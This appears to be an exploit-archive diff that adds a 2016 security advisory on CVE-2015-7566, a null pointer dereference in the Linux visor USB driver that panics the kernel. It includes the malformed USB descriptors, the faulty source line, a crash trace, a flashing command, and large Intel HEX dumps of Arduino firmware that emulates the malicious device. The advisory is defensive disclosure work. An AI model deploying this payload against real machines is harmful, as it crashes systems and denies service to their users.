+:100A10005CF51F930F939F928F920E948306E09143 +:100A20007505F0917605EE0DFF1D0284F385E02D2E +:100A3000EC0DFD1DC801880F991FA485B585A80F71 +:100A4000B91F4D915C910284F385E02DE80FF91FE9 +:100A50006081718180E00E94E0030F5F1F4F0F9063 +:100A60000F900F900F90C5CF8FEF681A780A8EE025 +:100A7000C80ED11C97CF8FED94E09F938F930E9467 +:100A800083060F900F9058C0C8012A8B0E94D5038F +:100A90002A892130C1F0233009F04EC08C851F9285 +:100AA0008F9389EF94E09F938F930E94830642E097 +:100AB00050E062E871E080E00E94E0030F900F9048 +:100AC0000F900F9035C04091000150E060E071E060 +:100AD00080E00E94E0032CC0873071F1883021F45F +:100AE00081E08093F10024C0893011F5937021F5E5 +:100AF000EDE4F1E081E021E096E38093E9002093CA +:100B0000EB0034913093EC009093ED008F5F3196C1 +:100B1000843099F78EE78093EA001092EA008C8582 +:100B20008093720505C0888999890E94D50304C005 +:100B30008EEF8093E80003C081E28093EB00629621 +:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE +:100B5000EF91BF91AF919F918F917F916F915F9135 +:100B60004F913F912F911F910F91FF90EF90DF9048 +:100B7000CF90BF90AF909F908F907F906F900F908D +:100B80000FBE0F901F9018951F920F920FB60F92E5 +:100B900011248F939F938091E1001092E10083FFD5 +:100BA0000FC01092E90091E09093EB001092EC00DE +:100BB00092E39093ED001092720598E09093F0000C +:100BC00082FF1AC080917E05882339F080917E05CE +:100BD000815080937E05882369F080917D0588236C +:100BE00059F080917D05815080937D05811104C06D +:100BF000289A02C05D9AF1CF9F918F910F900FBEFE +:100C00000F901F901895CF93DF93CDB7DEB782E199 +:100C1000FE013596A0E0B1E001900D928A95E1F7D2 +:100C20008F89988D9093760580937505898D9A8D1F +:100C300090937405809373058B8D9C8D90937C05A8 +:100C400080937B058D8D9E8D90937A058093790599 +:100C50008F8D98A1909378058093770510927205F7 +:100C600081E08093D70080EA8093D80082E189BD3B +:100C700009B400FEFDCF61E070E080E090E00E94EA +:100C80007B0280E98093D8008CE08093E200109290 +:100C9000E000559A209ADF91CF91089581E08093EA +:100CA000E00008959091C80095FFFCCF8093CE009E +:100CB00008951092CD0087E68093CC0088E1809360 +:100CC000C9008EE08093CA0008950F931F93CF93BD +:100CD000DF93EC018C01FE0101900020E9F73197D0 +:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E +:100CF000F80181918F010E945206EDCFDF91CF91D3 +:100D00001F910F910895CF93DF93CDB7DEB7DA959A +:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 +:100D2000419151919F0160E071E0CE0101960E94D6 +:100D30000707CE0101960E946506D3950FB6F89479 +:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE +:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 +:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E +:100D70003F932F9389839A830E9483068981882ECB +:100D80009A81992E0F900F9000E010E08EE5E82EEA +:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 +:100DA000E4F4F40181914F0190E09F938F93FF92BF +:100DB000EF920E9483060F5F1F4FC8018F70992723 +:100DC0000F900F900F900F90892B41F7DF92CF92E9 +:100DD0000E9483060F900F90E1CF81E194E09F93F2 +:100DE0008F930E9483060F900F900F900F90DF91CA +:100DF000CF911F910F91FF90EF90DF90CF90BF9018 +:100E0000AF909F908F900895F8940C94E809AEE00D +:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 +:100E20004C831A83098377FF02C060E070E8615049 +:100E300071097E836D83A901BC01CE0101960E94D8 +:100E400033074D815E8157FD0AC02F8138854217D7 +:100E500053070CF49A01F801E20FF31F10822E964B +:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB +:100E7000B1097C016B018A01FC0117821682838112 +:100E800081FFBDC1CE0101964C01F7019381F601AE +:100E900093FD859193FF81916F01882309F4ABC184 +:100EA000853239F493FD859193FF81916F018532ED +:100EB00029F4B70190E00E941B09E7CF512C312C97 +:100EC00020E02032A0F48B3269F030F4803259F007 +:100ED000833269F420612CC08D3239F0803339F4CB +:100EE000216026C02260246023C0286021C027FD25 +:100EF00027C030ED380F3A3078F426FF06C0FAE00C +:100F00005F9E300D1124532E13C08AE0389E300DA1 +:100F10001124332E20620CC08E3221F426FD6BC1C9 +:100F2000206406C08C3611F4206802C0883641F473 +:100F3000F60193FD859193FF81916F018111C1CFDE +:100F4000982F9F7D9554933028F40C5F1F4FFFE33B +:100F5000F9830DC0833631F0833771F0833509F0A2 +:100F60005BC022C0F801808189830E5F1F4F44243B +:100F70004394512C540115C03801F2E06F0E711CDE +:100F8000F801A080B18026FF03C0652D70E002C08B +:100F90006FEF7FEFC5012C870E9410092C018301A0 +:100FA0002C852F77222E17C03801F2E06F0E711CAE +:100FB000F801A080B18026FF03C0652D70E002C05B +:100FC0006FEF7FEFC5012C870E9405092C012C854E +:100FD0002068222E830123FC1BC0832D90E048163D +:100FE0005906B0F4B70180E290E00E941B093A94E0 +:100FF000F4CFF50127FC859127FE81915F01B701B0 +:1010000090E00E941B0931103A94F1E04F1A510808 +:101010004114510471F7E5C0843611F0893639F571 +:10102000F80127FF07C060817181828193810C5F85 +:101030001F4F08C060817181882777FD8095982FA8 +:101040000E5F1F4F2F76B22E97FF09C090958095A7 +:10105000709561957F4F8F4F9F4F2068B22E2AE089 +:1010600030E0A4010E944D09A82EA81844C085377D +:1010700029F42F7EB22E2AE030E025C0F22FF97F2E +:10108000BF2E8F36C1F018F4883579F0B4C08037A0 +:1010900019F0883721F0AFC02F2F2061B22EB4FE97 +:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D +:1010B0009660B92E06C028E030E005C020E130E09F +:1010C00002C020E132E0F801B7FE07C06081718103 +:1010D000828193810C5F1F4F06C06081718180E027 +:1010E00090E00E5F1F4FA4010E944D09A82EA81882 +:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 +:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 +:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 +:10112000FE01EA0DF11D8081803311F4297E09C092 +:1011300022FF06C07394739404C0822F867809F04E +:10114000739423FD13C020FF06C05A2C731418F4A7 +:10115000530C5718732C731468F4B70180E290E0B5 +:101160002C870E941B0973942C85F5CF731410F4FF +:10117000371801C0312C24FF12C0B70180E390E082 +:101180002C870E941B092C8522FF17C021FF03C05A +:1011900088E590E002C088E790E0B7010CC0822F9C +:1011A000867859F021FD02C080E201C08BE227FD64 +:1011B0008DE2B70190E00E941B09A51438F4B70135 +:1011C00080E390E00E941B095A94F7CFAA94F4019F +:1011D000EA0DF11D8081B70190E00E941B09A1106A +:1011E000F5CF332009F451CEB70180E290E00E94A0 +:1011F0001B093A94F6CFF7018681978102C08FEFE1 +:101200009FEF2C96E2E10C94CD09FC010590615012 +:1012100070400110D8F7809590958E0F9F1F08950C +:10122000FC016150704001900110D8F780959095B5 +:101230008E0F9F1F08950F931F93CF93DF93182F47 +:10124000092FEB018B8181FD03C08FEF9FEF20C041 +:1012500082FF10C04E815F812C813D814217530770 +:101260007CF4E881F9819F012F5F3F4F3983288308 +:10127000108306C0E885F985812F0995892B29F708 +:101280002E813F812F5F3F4F3F832E83812F902FF1 +:10129000DF91CF911F910F910895FA01AA2728306D +:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 +:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF +:1012C000781F891F9A1FA11D680F791F8A1F911D02 +:1012D000A11D6A0F711D811D911DA11D20D009F452 +:1012E00068943F912AE0269F11243019305D319394 +:1012F000DEF6CF010895462F4770405D4193B3E07D +:101300000FD0C9F7F6CF462F4F70405D4A3318F023 +:10131000495D31FD4052419302D0A9F7EACFB4E0D4 +:10132000A6959795879577956795BA95C9F700978C +:101330006105710508959B01AC010A2E069457952D +:10134000479537952795BA95C9F7620F731F841F84 +:10135000951FA01D0895EE0FFF1F0590F491E02D3D +:1013600009942F923F924F925F926F927F928F9249 +:101370009F92AF92BF92CF92DF92EF92FF920F9324 +:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E +:10139000F894DEBF0FBECDBF09942A8839884888EB +:1013A0005F846E847D848C849B84AA84B984C88481 +:1013B000DF80EE80FD800C811B81AA81B981CE0F78 +:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D +:0413D000F894FFCFBF +:1013D4001201000200000040AD0BEFBE000101024B +:1013E4000001220342006100640020004200410029 +:1013F40042004500250078002500780025006E0095 +:1014040025007000180342004100440020004300FE +:10141400300046004600450045002100120100024C +:10142400000000402D08000200010102030109022E +:10143400270001010000FA0705810304040C0705D5 +:10144400010204000C0705820104000C07000700D8 +:101454000700480100500072006F006C00690066CC +:101464000069006300000A550000006BFD180A00C3 +:10147400809F0AB901312B940A8101128946001315 +:10148400000257028B0A5E0AF80A5F01F212010099 +:1014940002010000400D055702000101020301B9D9 +:1014A4000A0100F80A5F0A810A220342006100640B +:1014B400002000420041004200450025007800253C +:1014C40000780025006E00250070001803420041DA +:1014D400004400200043003000460046004500451B +:1014E40000210012010002010000400D0557020016 +:1014F400010102030109040000030100000003F2DA +:101504000AEC0A0902270001010000FA01AB0A09EA +:101514000400000301000000090200202020202014 +:101524005F5F5F5F5F5F5F5F2020202020202020BF +:1015340020202020202020202020202020202020A7 +:1015440020205F5F5F5F5F205F5F20205F2020209F +:101554002020205F5F0A0D00202020202F205F5FC5 +:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 +:101574005F5F20205F5F5F5F5F20202020202F209F +:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 +:10159400202F5F5F0A0D002020202F202F202020E5 +:1015A4002F205F5F205C2F205F5F20602F205F5F14 +:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A +:1015C400205C2F205F5F2F202F205F5F5F2F202F55 +:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 +:1015E4002F202F202F202F5F2F202F202F5F2F2001 +:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 +:101604002F202F5F2F202F202F5F5F2F202C3C0AAD +:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 +:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F +:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 +:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 +:101654003C3C2043485241534820414E59204F506E +:1016640045524154494E472053595354454D203E09 +:101674003E0A0D00203C3C202863292053657267F4 +:10168400656A20536368756D696C6F20323031353B +:101694002C204F70656E536F7572636520536563BC +:1016A40075726974792052616C66205370656E6E30 +:1016B4006562657267203E3E0A0D000A3E3E205078 +:1016C4007265737320627574746F6E20746F207307 +:1016D4007461727420657865637574696F6E2E2EFB +:1016E4002E0A0D005B44454255475D2045786563ED +:1016F400757465207061796C6F616420300A0D0027 +:10170400526563762D446174613A0A0D005B444569 +:101714004255475D200953656E6420436F6E6669C8 +:101724006775726174696F6E44657363726970740E +:101734006F720928696E6465783A2569292E2E2E00 +:101744000D0A005B44454255475D200953656E64AC +:1017540020496E74657266616365204465736372C3 +:101764006970746F720928696E7465726661636565 +:101774003A2569292E2E2E0D0A005B444542554711 +:101784005D200953656E6420456E64706F696E74E4 +:101794002044657363726970746F720928656E649E +:1017A400706F696E743A2569292E2E2E0D0A005B1E +:1017B40044454255475D203C3C70616E6963206D31 +:1017C4006F64653F3E3E0D0A005B44454255475DEC +:1017D4002009203E3E20537472696E67204465736D +:1017E40063726970746F72207265717565737420A9 +:1017F4002D2073656E64696E67206D616C666F720F +:101804006D656420737472696E67212073657475E5 +:10181400702E7756616C75654C203D3D2025690D11 +:101824000A005B48455844554D505D0A0D0025306B +:041834003258200006 +:00000001FF diff --git a/platforms/linux/dos/39540.txt b/platforms/linux/dos/39540.txt new file mode 100755 index 000000000..6c107319e --- /dev/null +++ b/platforms/linux/dos/39540.txt @@ -0,0 +1,622 @@ +OS-S Security Advisory 2016-09 +Linux visor clie_5_attach Nullpointer Dereference + +Date: March 4th, 2016 +Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg +CVE: CVE-2015-7566 +CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) +Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid +USB device descriptors (visor clie_5_attach driver) +Severity: Critical. The Kernel panics. A reboot is required. +Ease of Exploitation: Trivial +Vulnerability type: Wrong input validation +Products: RHEL 7.1 including all updates +Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the +CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7) +Vendor: Red Hat +Vendor contacted: November, 12th 2015 +PDF of advisory: https://os-s.net/advisories/OSS-2016-09_visor_clie_5_attach.pdf + +Abstract: +The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB +device requiring the visor (clie_5_attach) driver. + +Detailed product description: +We confirmed the bug on the following system: +RHEL 7.1 +Kernel 3.10.0-229.20.1.el7.x86_64 +Further products or kernel versions have not been tested. +How reproducible: Always +Actual results: Kernel crashes. + +Description: +The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo +(github.com/schumilo) using the following device descriptor: + +[*] Device-Descriptor +bLength: 0x12 +bDescriptorType: 0x1 +bcdUSB: 0x200 +bDeviceClass: 0x3 +bDeviceSubClass: 0x0 +bDeviceProtocol: 0x0 +bMaxPacketSize: 0x40 +idVendor: 0x54c +idProduct: 0x144 +bcdDevice: 0x100 +iManufacturer: 0x1 +iProduct: 0x2 +iSerialNumbers: 0x3 +bNumConfigurations: 0x1 + +The clie_5_attach function of the visor driver, which is called during the +driver initialization process, expects an OUT-Bulk-Endpoint. +Due to an incomplete sanity check, the visor driver tries to dereference null- +pointers. +This results in a crash of the system. + +**** +$ nm visor.ko.debug | grep clie_5_attach +0000000000000030 t clie_5_attach +$ addr2line -e visor.ko.debug 6d +/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_ +64/drivers/usb/serial/visor.c:610 +**** + +**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/visor.c) +... +607 +608 pipe = usb_sndbulkpipe(serial->dev, port->bulk_out_endpointAddress); +609 for (j = 0; j < ARRAY_SIZE(port->write_urbs); ++j) +610 port->write_urbs[j]->pipe = pipe; /* if there is no configured OUT- +bulk-endpoint, the kernel tries to dereference null-pointers */ +611 +612 return 0; +613 } +... +**** + +[*] Configuration-Descriptor +bLength: 0x9 +bDescriptorType: 0x2 +wTotalLength: 0x27 +bNumInterfaces: 0x1 +bConfigurationValue: 0x1 +iConfiguration: 0x0 +bmAttributes: 0x0 +bMaxPower: 0x31 +[*] Interface-Descriptor +bLength: 0x9 +bDescriptorType: 0x4 +bInterfaceNumber: 0x0 +bAlternateSetting: 0x0 +bNumEndpoints: 0x3 +bInterfaceClass: 0x0 +bInterfaceSubClass: 0x0 +bInterfaceProtocol: 0x0 +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x81 ï?? IN-Direction +bmAttribut: 0x1 ï?? ISO-Transfer +wMaxPacketSize: 0x404 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x1 ï??OUT-Direction +bmAttribut: 0x1 ï??ISO-Transfer (change this +value to 0x2, which is the value for bulk-transfer without additional +features, and the visor driver won't crash) +wMaxPacketSize: 0x4 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x82 ï??IN-Direction +bmAttribut: 0x1 ï??ISO-Transfer +wMaxPacketSize: 0x4 +bInterval: 0xc + +Proof of Concept: +For a proof of concept, we are providing an Arduino Leonardo firmware file. This +firmware will emulate the defective USB device. + +avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U +flash:w:binary.hex + +The firmware has been attached to this bug report. +To prevent the automated delivery of the payload, a jumper may be used to +connect port D3 and 3V3! + +Severity and Ease of Exploitation: +The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, +only physical access to the system is required. + +Vendor Communication: +We contacted Red Hat on the November, 12th 2015. +This bug was fixed upstream. A CVE number was not assigned. + +References: +https://bugzilla.redhat.com/show_bug.cgi?id=1283371 +http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i +d=cb3232138e37129e88240a98a1d2aba2187ff57c + +Kernel Stacktrace: + +[ 34.568077] usb 1-1: new full-speed USB device number 2 using xhci_hcd +[ 34.791731] usb 1-1: New USB device found, idVendor=054c, idProduct=0144 +[ 34.795463] usb 1-1: New USB device strings: Mfr=1, Product=2, +SerialNumber=3 +[ 34.799619] usb 1-1: Product: Ä? +[ 34.804592] usb 1-1: Manufacturer: Ä? +[ 34.810144] usb 1-1: SerialNumber: % +[ 34.872285] usbcore: registered new interface driver visor +[ 34.879838] usbserial: USB Serial support registered for Handspring Visor / +Palm OS +[ 34.890481] usbserial: USB Serial support registered for Sony Clie 5.0 +[ 34.897769] usbserial: USB Serial support registered for Sony Clie 3.5 +[ 34.914162] visor 1-1:1.0: Sony Clie 5.0 converter detected +[ 34.920288] BUG: unable to handle kernel NULL pointer dereference at +0000000000000058 +[ 34.921136] IP: [] clie_5_attach+0x3d/0x60 [visor] +[ 34.921136] PGD 0 +[ 34.921136] Oops: 0002 [#1] SMP +[ 34.921136] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT +xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables +ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle +ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat +nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack +iptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm +ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 +i2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif +cdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy +dm_mirror dm_region_hash dm_log dm_mod +[ 34.921136] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted +3.10.0-229.14.1.el7.x86_64 #1 +[ 34.921136] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS +rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 +[ 34.921136] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000 +[ 34.921136] RIP: 0010:[] [] +clie_5_attach+0x3d/0x60 [visor] +[ 34.921136] RSP: 0018:ffff88000bd23a80 EFLAGS: 00010286 +[ 34.921136] RAX: 00000000c0000200 RBX: ffff88000af979d0 RCX: 0000000000000000 +[ 34.921136] RDX: ffff88000be6b000 RSI: ffff88000af979c0 RDI: ffff88000af979c0 +[ 34.921136] RBP: ffff88000bd23a80 R08: 0000000000000000 R09: 0000000000000000 +[ 34.921136] R10: 0000000000000000 R11: ffff88000c3b9800 R12: ffff88000af979d0 +[ 34.921136] R13: ffff88000c525830 R14: ffff88000af979c0 R15: ffffffffa0395200 +[ 34.921136] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) +knlGS:0000000000000000 +[ 34.921136] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +[ 34.921136] CR2: 0000000000000058 CR3: 000000000d2a1000 CR4: +00000000000006f0 +[ 34.921136] DR0: 0000000000000000 DR1: 0000000000000000 DR2: +0000000000000000 +[ 34.921136] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 +[ 34.921136] Stack: +[ 34.921136] ffff88000bd23c18 ffffffff8145fed1 0000000000000007 000000020bd23af8 +[ 34.921136] ffff88000c525830 0000000000000000 0000000000000000 ffffffff00000000 +[ 34.921136] ffff88000bcd0000 ffff880000000001 ffff88000bcd0090 0000000000000000 +[ 34.921136] Call Trace: +[ 34.921136] [] usb_serial_probe+0xdb1/0x1230 +[ 34.921136] [] ? ida_get_new_above+0x7c/0x2a0 +[ 34.921136] [] ? kmem_cache_alloc+0x1ba/0x1d0 +[ 34.921136] [] ? sysfs_addrm_finish+0x42/0xe0 +[ 34.921136] [] ? __sysfs_add_one+0x61/0x100 +[ 34.921136] [] usb_probe_interface+0x1c4/0x2f0 +[ 34.921136] [] driver_probe_device+0x87/0x390 +[ 34.921136] [] __driver_attach+0x93/0xa0 +[ 34.921136] [] ? __device_attach+0x40/0x40 +[ 34.921136] [] bus_for_each_dev+0x73/0xc0 +[ 34.921136] [] driver_attach+0x1e/0x20 +[ 34.921136] [] usb_serial_register_drivers+0x29b/0x580 +[ 34.921136] [] ? 0xffffffffa0397fff +[ 34.921136] [] usb_serial_module_init+0x1e/0x1000 [visor] +[ 34.921136] [] do_one_initcall+0xb8/0x230 +[ 34.921136] [] load_module+0x133e/0x1b40 +[ 34.921136] [] ? ddebug_proc_write+0xf0/0xf0 +[ 34.921136] [] ? copy_module_from_fd.isra.42+0x53/0x150 +[ 34.921136] [] SyS_finit_module+0xa6/0xd0 +[ 34.921136] [] system_call_fastpath+0x16/0x1b +[ 34.921136] Code: 28 48 8b 57 20 0f b6 80 28 02 00 00 88 82 28 02 00 00 48 +8b 0f c1 e0 0f 0d 00 00 00 c0 8b 09 c1 e1 08 09 c8 48 8b 8a 10 02 00 00 <89> +41 58 48 8b 92 18 02 00 00 89 42 58 31 c0 5d c3 66 90 b8 ff +[ 34.921136] RIP [] clie_5_attach+0x3d/0x60 [visor] +[ 34.921136] RSP +[ 34.921136] CR2: 0000000000000058 +[ 35.341720] ---[ end trace b239663354a1c556 ]--- +[ 35.347341] Kernel panic - not syncing: Fatal exception +[ 35.348314] drm_kms_helper: panic occurred, switching back to text console + +Arduino Leonardo Firmware: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C4050C942F04CA +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940E02C1 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C5000B030E0302 +:1000B000010305032F032F032F03120316031A0353 +:1000C000200324032F032A030000000200080E006F +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E4EDF3E102C005900D92A436B107D1 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9404070C940000089545 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B +:1001B00083E00E94300361E087E00E94300361E049 +:1001C00088E00E9430030E9459067E012AE9E20E6F +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 +:1002C0009C92F4E01196FC9311971496EC93F9012B +:1002D000DC01292D01900D922A95E1F7FE01EC56E3 +:1002E000FF4FDC011B96FC93EE931A971D96BC9270 +:1002F000AE921C971183008373836283558344837A +:100300000C5211092CE0F80111922A95E9F721E02D +:10031000D80119962C931997FE01E059FF4F0190CF +:100320000D929A94E1F7F8019387828761E088E063 +:100330000E9469038BE492E00E94650688E892E0DF +:100340000E94650687EC92E00E94650686E093E0D5 +:100350000E94650682E493E00E9465068FE793E0C1 +:100360000E94650684EA93E00E9465068BEE93E0A6 +:100370000E94650683E00E949F03892B09F047C015 +:100380005E01F3E2AF0EB11C8824839482E1982EC3 +:1003900084E194E00E946506BF92AF92DF92CF9213 +:1003A000FF92EF921F928F921F930F932DB73EB73C +:1003B000225131090FB6F8943EBF0FBE2DBFADB725 +:1003C000BEB71196FE01FB96892D01900D928A957C +:1003D000E1F78DE695E00E94030668E873E180E0AE +:1003E00090E00E947B028DE695E00E944E0660E060 +:1003F00087E00E94690368E873E180E090E00E9472 +:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E +:1004100070E080E090E00E947B02ACCF1F920F92D0 +:100420000FB60F9211242F933F938F939F93AF9307 +:10043000BF938091650590916605A0916705B09185 +:1004400068053091640523E0230F2D3720F40196D1 +:10045000A11DB11D05C026E8230F0296A11DB11DE7 +:10046000209364058093650590936605A0936705C6 +:10047000B09368058091690590916A05A0916B051C +:10048000B0916C050196A11DB11D809369059093F3 +:100490006A05A0936B05B0936C05BF91AF919F91D6 +:1004A0008F913F912F910F900FBE0F901F90189535 +:1004B0003FB7F8948091690590916A05A0916B050A +:1004C000B0916C0526B5A89B05C02F3F19F0019689 +:1004D000A11DB11D3FBF6627782F892F9A2F620F6C +:1004E000711D811D911D42E0660F771F881F991FA6 +:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 +:10050000DF936B017C010E945802EB01C114D104FE +:10051000E104F10479F00E9458026C1B7D0B683EE7 +:100520007340A0F381E0C81AD108E108F108C8516E +:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 +:100540000895789484B5826084BD84B5816084BD4B +:1005500085B5826085BD85B5816085BDEEE6F0E03C +:10056000808181608083E1E8F0E010828081826098 +:100570008083808181608083E0E8F0E08081816019 +:100580008083E1E9F0E08081826080838081816006 +:100590008083E0E9F0E0808181608083E1ECF0E03D +:1005A000808184608083808182608083808181609B +:1005B0008083E3ECF0E0808181608083E0ECF0E018 +:1005C000808182608083E2ECF0E0808181608083C2 +:1005D000EAE7F0E0808184608083808182608083AC +:1005E000808181608083808180688083089590E02D +:1005F000FC013197EE30F10590F5EA5AFF4F0C946B +:10060000AB09809180008F7703C0809180008F7D3F +:1006100080938000089584B58F7702C084B58F7D64 +:1006200084BD0895809190008F7707C080919000DD +:100630008F7D03C080919000877F80939000089504 +:100640008091C0008F7703C08091C0008F7D809320 +:10065000C00008958091C200877F8093C2000895F2 +:10066000CF93DF9390E0FC01EA51FF4F2491FC010E +:10067000EC5FFE4F8491882349F190E0880F991F29 +:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 +:10069000C591D4919FB7611108C0F8948C912095B1 +:1006A00082238C93888182230AC0623051F4F894AB +:1006B0008C91322F309583238C938881822B888371 +:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 +:1006D00008950F931F93CF93DF931F92CDB7DEB78B +:1006E000282F30E0F901E853FF4F8491F901EA51D6 +:1006F000FF4F1491F901EC5FFE4F04910023C9F004 +:10070000882321F069830E94F7026981E02FF0E0DD +:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 +:100720008C91611103C01095812301C0812B8C93A2 +:100730009FBF0F90DF91CF911F910F910895CF939D +:10074000DF93282F30E0F901E853FF4F8491F9013E +:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 +:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 +:10077000EE5DFE4FA591B4912C912D2381E090E088 +:1007800021F480E002C080E090E0DF91CF910895F5 +:10079000615030F02091F100FC0120830196F8CFE8 +:1007A000289884E680937D0508951092E9001092C0 +:1007B00071051092700590936F0580936E050895F2 +:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 +:1007D000BA01C8010E94A606F80120E030E08EEFC1 +:1007E0002C173D0791F1F7FE02C0A49101C0A08132 +:1007F000609170057091710540916E0550916F0583 +:1008000064177507ACF49091E8009570E1F390914E +:10081000E80092FD1CC0A093F100A0917005B0917A +:1008200071051196AF73BB27AB2B11F48093E800D1 +:10083000A0917005B09171051196B0937105A093C8 +:1008400070052F5F3F4F3196CBCFC90102C08FEFAC +:100850009FEFDF91CF911F910F91FF9008951F920D +:100860000F920FB60F9211246F927F928F929F92E8 +:10087000AF92BF92CF92DF92EF92FF920F931F93AE +:100880002F933F934F935F936F937F938F939F9398 +:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 +:1008A0006297DEBFCDBF1092E9008091E80083FF20 +:1008B00046C168E0CE010A960E94C80382EF809389 +:1008C000E8009A8597FF05C08091E80080FFFCCF83 +:1008D00003C08EEF8093E800892F807609F023C152 +:1008E0008B85811105C01092F1001092F10020C19A +:1008F000282F2D7F213009F41BC1853049F48091C8 +:10090000E80080FFFCCF8C8580688093E30010C1F5 +:10091000863009F0E1C02D8508891989223009F057 +:10092000B3C0EC848E2D90E0209173053091740556 +:10093000821793070CF09FC00E94D5031F92EF927D +:100940008DE394E09F938F930E9483068CE0E89E52 